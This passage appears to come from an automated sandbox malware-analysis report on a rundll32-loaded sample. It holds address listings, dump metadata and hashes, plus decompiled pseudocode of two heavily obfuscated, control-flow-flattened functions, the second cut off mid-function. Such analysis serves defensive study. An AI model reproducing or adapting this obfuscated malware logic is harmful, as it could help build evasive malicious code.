                                                                                                                                  0x002f0415
                                                                                                                                  0x002f0422
                                                                                                                                  0x002f042a
                                                                                                                                  0x002f042f
                                                                                                                                  0x002f0434
                                                                                                                                  0x002f043c
                                                                                                                                  0x002f0444
                                                                                                                                  0x002f044c
                                                                                                                                  0x002f0454
                                                                                                                                  0x002f045c
                                                                                                                                  0x002f0464
                                                                                                                                  0x002f046c
                                                                                                                                  0x002f0471
                                                                                                                                  0x002f0479
                                                                                                                                  0x002f0481
                                                                                                                                  0x002f0489
                                                                                                                                  0x002f0491
                                                                                                                                  0x002f0499
                                                                                                                                  0x002f04a1
                                                                                                                                  0x002f04b5
                                                                                                                                  0x002f04ba
                                                                                                                                  0x002f04c1
                                                                                                                                  0x002f04cc
                                                                                                                                  0x002f04d7
                                                                                                                                  0x002f04e2
                                                                                                                                  0x002f04ed
                                                                                                                                  0x002f04f8
                                                                                                                                  0x002f0503
                                                                                                                                  0x002f050b
                                                                                                                                  0x002f0516
                                                                                                                                  0x002f0521
                                                                                                                                  0x002f0530
                                                                                                                                  0x002f0533
                                                                                                                                  0x002f0537
                                                                                                                                  0x002f053b
                                                                                                                                  0x002f0543
                                                                                                                                  0x002f054b
                                                                                                                                  0x002f055e
                                                                                                                                  0x002f0565
                                                                                                                                  0x002f0570
                                                                                                                                  0x002f0580
                                                                                                                                  0x002f0584
                                                                                                                                  0x002f058c
                                                                                                                                  0x002f0594
                                                                                                                                  0x002f05a1
                                                                                                                                  0x002f05ad
                                                                                                                                  0x002f05b6
                                                                                                                                  0x002f05b7
                                                                                                                                  0x002f05bb
                                                                                                                                  0x002f05c3
                                                                                                                                  0x002f05cb
                                                                                                                                  0x002f05d0
                                                                                                                                  0x002f05d5
                                                                                                                                  0x002f05dd
                                                                                                                                  0x002f05e5
                                                                                                                                  0x002f05ed
                                                                                                                                  0x002f05f8
                                                                                                                                  0x002f05fc
                                                                                                                                  0x002f0604
                                                                                                                                  0x002f060f
                                                                                                                                  0x002f061a
                                                                                                                                  0x002f0625
                                                                                                                                  0x002f062d
                                                                                                                                  0x002f0642
                                                                                                                                  0x002f0647
                                                                                                                                  0x002f064d
                                                                                                                                  0x002f0655
                                                                                                                                  0x002f065d
                                                                                                                                  0x002f0669
                                                                                                                                  0x002f066e
                                                                                                                                  0x002f0674
                                                                                                                                  0x002f067c
                                                                                                                                  0x002f0684
                                                                                                                                  0x002f068c
                                                                                                                                  0x002f0697
                                                                                                                                  0x002f069f
                                                                                                                                  0x002f06aa
                                                                                                                                  0x002f06b2
                                                                                                                                  0x002f06b7
                                                                                                                                  0x002f06c4
                                                                                                                                  0x002f06c5
                                                                                                                                  0x002f06cc
                                                                                                                                  0x002f06d0
                                                                                                                                  0x002f06d8
                                                                                                                                  0x002f06e0
                                                                                                                                  0x002f06e5
                                                                                                                                  0x002f06f3
                                                                                                                                  0x002f06f7
                                                                                                                                  0x002f06ff
                                                                                                                                  0x002f070a
                                                                                                                                  0x002f0715
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0722
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0728
                                                                                                                                  0x002f0728
                                                                                                                                  0x002f072e
                                                                                                                                  0x002f098a
                                                                                                                                  0x002f0991
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0734
                                                                                                                                  0x002f073a
                                                                                                                                  0x002f08ea
                                                                                                                                  0x002f08f3
                                                                                                                                  0x002f08fb
                                                                                                                                  0x002f0901
                                                                                                                                  0x002f095c
                                                                                                                                  0x002f0967
                                                                                                                                  0x002f096a
                                                                                                                                  0x002f096f
                                                                                                                                  0x002f0993
                                                                                                                                  0x002f0995
                                                                                                                                  0x002f099a
                                                                                                                                  0x002f0740
                                                                                                                                  0x002f0742
                                                                                                                                  0x002f08ca
                                                                                                                                  0x002f08d1
                                                                                                                                  0x002f08d4
                                                                                                                                  0x002f08d6
                                                                                                                                  0x002f08de
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0748
                                                                                                                                  0x002f074e
                                                                                                                                  0x002f0831
                                                                                                                                  0x002f083c
                                                                                                                                  0x002f0840
                                                                                                                                  0x002f0855
                                                                                                                                  0x002f0856
                                                                                                                                  0x002f085b
                                                                                                                                  0x002f085e
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0722
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0722
                                                                                                                                  0x002f0754
                                                                                                                                  0x002f075a
                                                                                                                                  0x002f0811
                                                                                                                                  0x002f0817
                                                                                                                                  0x002f081f
                                                                                                                                  0x002f081f
                                                                                                                                  0x002f0822
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002f081c
                                                                                                                                  0x002f081c
                                                                                                                                  0x002f081c
                                                                                                                                  0x002f0824
                                                                                                                                  0x002f0827
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0760
                                                                                                                                  0x002f0760
                                                                                                                                  0x002f0766
                                                                                                                                  0x002f076c
                                                                                                                                  0x002f0778
                                                                                                                                  0x002f0786
                                                                                                                                  0x002f0794
                                                                                                                                  0x002f07cb
                                                                                                                                  0x002f07d8
                                                                                                                                  0x002f07dc
                                                                                                                                  0x002f07ea
                                                                                                                                  0x002f07ff
                                                                                                                                  0x002f0804
                                                                                                                                  0x002f0807
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0722
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0723
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0766
                                                                                                                                  0x002f075a
                                                                                                                                  0x002f074e
                                                                                                                                  0x002f0742
                                                                                                                                  0x002f073a
                                                                                                                                  0x002f099b
                                                                                                                                  0x002f099b
                                                                                                                                  0x002f09b4
                                                                                                                                  0x002f09b4
                                                                                                                                  0x002f0723

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Agz$DWK$E+A$g$pw
                                                                                                                                  • API String ID: 0-1474679353
                                                                                                                                  • Opcode ID: e19684cd700c23a53156fafab9a269d0b6ae1f2e75af4686c5b76aaa0ae90852
                                                                                                                                  • Instruction ID: 1566f525b8cd1bd1647ae5b6587b116d744efae2c7eb4253de73acac3f411042
                                                                                                                                  • Opcode Fuzzy Hash: e19684cd700c23a53156fafab9a269d0b6ae1f2e75af4686c5b76aaa0ae90852
                                                                                                                                  • Instruction Fuzzy Hash: 4D32137150C3808FD368CF25C98AA9BFBF2BBC4748F10891DE29986261D7B59959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DF09B Relevance: 6.6, Strings: 5, Instructions: 359COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002DF09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002EDA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E002DB6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E002D8969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E002D47CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E002EDCF7(_v2620, 0x2d1308, _t515),  &_v1560, _v2720, _v2688);
							E002DA8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E002DEA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E002E46BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E002D47CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E002EDCF7(_v2708, 0x2d1348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E002DA8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E002DAB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}



































































                                                                                                                                  0x002df09b
                                                                                                                                  0x002df0a1
                                                                                                                                  0x002df0ae
                                                                                                                                  0x002df0b6
                                                                                                                                  0x002df0c1
                                                                                                                                  0x002df0c9
                                                                                                                                  0x002df0d1
                                                                                                                                  0x002df0d9
                                                                                                                                  0x002df0e1
                                                                                                                                  0x002df0e9
                                                                                                                                  0x002df0fa
                                                                                                                                  0x002df0fc
                                                                                                                                  0x002df101
                                                                                                                                  0x002df106
                                                                                                                                  0x002df110
                                                                                                                                  0x002df115
                                                                                                                                  0x002df11b
                                                                                                                                  0x002df123
                                                                                                                                  0x002df136
                                                                                                                                  0x002df139
                                                                                                                                  0x002df140
                                                                                                                                  0x002df14b
                                                                                                                                  0x002df153
                                                                                                                                  0x002df160
                                                                                                                                  0x002df164
                                                                                                                                  0x002df16c
                                                                                                                                  0x002df174
                                                                                                                                  0x002df179
                                                                                                                                  0x002df185
                                                                                                                                  0x002df18a
                                                                                                                                  0x002df190
                                                                                                                                  0x002df198
                                                                                                                                  0x002df1a4
                                                                                                                                  0x002df1a9
                                                                                                                                  0x002df1af
                                                                                                                                  0x002df1b4
                                                                                                                                  0x002df1bc
                                                                                                                                  0x002df1c4
                                                                                                                                  0x002df1cc
                                                                                                                                  0x002df1d4
                                                                                                                                  0x002df1dc
                                                                                                                                  0x002df1e7
                                                                                                                                  0x002df1f2
                                                                                                                                  0x002df1fd
                                                                                                                                  0x002df205
                                                                                                                                  0x002df20a
                                                                                                                                  0x002df213
                                                                                                                                  0x002df216
                                                                                                                                  0x002df21a
                                                                                                                                  0x002df222
                                                                                                                                  0x002df22a
                                                                                                                                  0x002df234
                                                                                                                                  0x002df238
                                                                                                                                  0x002df240
                                                                                                                                  0x002df24d
                                                                                                                                  0x002df258
                                                                                                                                  0x002df263
                                                                                                                                  0x002df26b
                                                                                                                                  0x002df276
                                                                                                                                  0x002df27b
                                                                                                                                  0x002df281
                                                                                                                                  0x002df289
                                                                                                                                  0x002df291
                                                                                                                                  0x002df29c
                                                                                                                                  0x002df2a7
                                                                                                                                  0x002df2b2
                                                                                                                                  0x002df2ba
                                                                                                                                  0x002df2bf
                                                                                                                                  0x002df2c7
                                                                                                                                  0x002df2d4
                                                                                                                                  0x002df2d7
                                                                                                                                  0x002df2db
                                                                                                                                  0x002df2e8
                                                                                                                                  0x002df2ec
                                                                                                                                  0x002df2f4
                                                                                                                                  0x002df307
                                                                                                                                  0x002df30e
                                                                                                                                  0x002df319
                                                                                                                                  0x002df321
                                                                                                                                  0x002df326
                                                                                                                                  0x002df32e
                                                                                                                                  0x002df336
                                                                                                                                  0x002df346
                                                                                                                                  0x002df34a
                                                                                                                                  0x002df34f
                                                                                                                                  0x002df357
                                                                                                                                  0x002df369
                                                                                                                                  0x002df36e
                                                                                                                                  0x002df377
                                                                                                                                  0x002df382
                                                                                                                                  0x002df38d
                                                                                                                                  0x002df398
                                                                                                                                  0x002df3a3
                                                                                                                                  0x002df3af
                                                                                                                                  0x002df3b4
                                                                                                                                  0x002df3ba
                                                                                                                                  0x002df3c2
                                                                                                                                  0x002df3ca
                                                                                                                                  0x002df3d2
                                                                                                                                  0x002df3dd
                                                                                                                                  0x002df3e8
                                                                                                                                  0x002df3f3
                                                                                                                                  0x002df3fb
                                                                                                                                  0x002df408
                                                                                                                                  0x002df409
                                                                                                                                  0x002df40d
                                                                                                                                  0x002df415
                                                                                                                                  0x002df41d
                                                                                                                                  0x002df42b
                                                                                                                                  0x002df42f
                                                                                                                                  0x002df437
                                                                                                                                  0x002df43e
                                                                                                                                  0x002df44b
                                                                                                                                  0x002df453
                                                                                                                                  0x002df458
                                                                                                                                  0x002df460
                                                                                                                                  0x002df468
                                                                                                                                  0x002df470
                                                                                                                                  0x002df478
                                                                                                                                  0x002df480
                                                                                                                                  0x002df488
                                                                                                                                  0x002df490
                                                                                                                                  0x002df498
                                                                                                                                  0x002df4a0
                                                                                                                                  0x002df4a8
                                                                                                                                  0x002df4b0
                                                                                                                                  0x002df4b8
                                                                                                                                  0x002df4c3
                                                                                                                                  0x002df4ce
                                                                                                                                  0x002df4d9
                                                                                                                                  0x002df4e1
                                                                                                                                  0x002df4e6
                                                                                                                                  0x002df4ee
                                                                                                                                  0x002df4f6
                                                                                                                                  0x002df4fe
                                                                                                                                  0x002df50c
                                                                                                                                  0x002df50f
                                                                                                                                  0x002df513
                                                                                                                                  0x002df51b
                                                                                                                                  0x002df523
                                                                                                                                  0x002df52b
                                                                                                                                  0x002df530
                                                                                                                                  0x002df538
                                                                                                                                  0x002df543
                                                                                                                                  0x002df54b
                                                                                                                                  0x002df556
                                                                                                                                  0x002df561
                                                                                                                                  0x002df569
                                                                                                                                  0x002df574
                                                                                                                                  0x002df587
                                                                                                                                  0x002df58e
                                                                                                                                  0x002df599
                                                                                                                                  0x002df5a1
                                                                                                                                  0x002df5a6
                                                                                                                                  0x002df5ae
                                                                                                                                  0x002df5b6
                                                                                                                                  0x002df5c3
                                                                                                                                  0x002df5c7
                                                                                                                                  0x002df5cf
                                                                                                                                  0x002df5d7
                                                                                                                                  0x002df5df
                                                                                                                                  0x002df5e7
                                                                                                                                  0x002df5ef
                                                                                                                                  0x002df5f7
                                                                                                                                  0x002df602
                                                                                                                                  0x002df60a
                                                                                                                                  0x002df611
                                                                                                                                  0x002df61c
                                                                                                                                  0x002df624
                                                                                                                                  0x002df62c
                                                                                                                                  0x002df630
                                                                                                                                  0x002df638
                                                                                                                                  0x002df640
                                                                                                                                  0x002df648
                                                                                                                                  0x002df650
                                                                                                                                  0x002df658
                                                                                                                                  0x002df663
                                                                                                                                  0x002df66b
                                                                                                                                  0x002df676
                                                                                                                                  0x002df67e
                                                                                                                                  0x002df686
                                                                                                                                  0x002df68e
                                                                                                                                  0x002df696
                                                                                                                                  0x002df6a4
                                                                                                                                  0x002df7b0
                                                                                                                                  0x00000000
                                                                                                                                  0x002df6aa
                                                                                                                                  0x002df6aa
                                                                                                                                  0x002df6b0
                                                                                                                                  0x002df883
                                                                                                                                  0x002df883
                                                                                                                                  0x002df889
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002df6b6
                                                                                                                                  0x002df6d2
                                                                                                                                  0x002df700
                                                                                                                                  0x002df70a
                                                                                                                                  0x002df70f
                                                                                                                                  0x002df71b
                                                                                                                                  0x002df762
                                                                                                                                  0x002df777
                                                                                                                                  0x002df795
                                                                                                                                  0x002df799
                                                                                                                                  0x002df79e
                                                                                                                                  0x002df7a3
                                                                                                                                  0x002df7a9
                                                                                                                                  0x00000000
                                                                                                                                  0x002df7a9
                                                                                                                                  0x002df7a3
                                                                                                                                  0x002df6b0
                                                                                                                                  0x002df898
                                                                                                                                  0x002df898
                                                                                                                                  0x002df7ba
                                                                                                                                  0x002df7c8
                                                                                                                                  0x002df7cf
                                                                                                                                  0x002df7de
                                                                                                                                  0x002df7df
                                                                                                                                  0x002df7e4
                                                                                                                                  0x002df7f0
                                                                                                                                  0x002df837
                                                                                                                                  0x002df843
                                                                                                                                  0x002df849
                                                                                                                                  0x002df858
                                                                                                                                  0x002df85c
                                                                                                                                  0x002df85e
                                                                                                                                  0x002df85f
                                                                                                                                  0x002df861
                                                                                                                                  0x002df863
                                                                                                                                  0x002df86e
                                                                                                                                  0x002df875
                                                                                                                                  0x002df876
                                                                                                                                  0x002df87b
                                                                                                                                  0x002df87e
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: kD$)$5$<!$Q0
                                                                                                                                  • API String ID: 0-101729813
                                                                                                                                  • Opcode ID: 41002a9ac84c7c5090ddd45aeebf3900ead9164cc56e113310500283a05bae81
                                                                                                                                  • Instruction ID: 7f5964b29f78df532ba46680f3750b26b81620e769132438bbd9b0bc3e7b5cc1
                                                                                                                                  • Opcode Fuzzy Hash: 41002a9ac84c7c5090ddd45aeebf3900ead9164cc56e113310500283a05bae81
                                                                                                                                  • Instruction Fuzzy Hash: 901210715083809FD3A8CF21C48AA8BFBE2FBC4718F50891DE6D986260D7B58959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E66CA Relevance: 6.5, Strings: 5, Instructions: 240COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002E66CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
